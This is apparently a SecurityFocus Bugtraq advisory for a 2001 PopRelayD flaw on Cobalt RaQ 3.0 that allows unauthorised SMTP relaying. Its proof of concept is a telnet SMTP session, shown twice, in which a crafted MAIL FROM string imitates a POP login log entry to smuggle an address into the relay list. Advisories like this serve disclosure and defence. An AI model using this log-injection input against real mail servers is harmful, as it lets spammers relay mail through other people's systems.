Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability
BID:2986
Info
Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability
| Bugtraq ID: | 2986 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 04 2001 12:00AM |
| Updated: | Jul 04 2001 12:00AM |
| Credit: | This vulnerability was announced to Bugtraq by Andrea Barisani <[email protected]> on July 3, 2001. |
| Vulnerable: |
Cobalt RaQ 3.0 |
| Not Vulnerable: | |
Exploit / POC
Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability
telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required
Solution / Fix
Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Cobalt RaQ 3.0
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Cobalt RaQ 3.0
-
Sun RaQ3 poprelayd-2.0-4.noarch.rpm
ftp://ftp.cobaltnet.com/pub/experimental/RPMS/poprelayd-2.0-4.noarch.r pm -
Sun RaQ3 poprelayd-2.0-4.src.rpm
ftp://ftp.cobaltnet.com/pub/experimental/SRPMS/poprelayd-2.0-4.src.rpm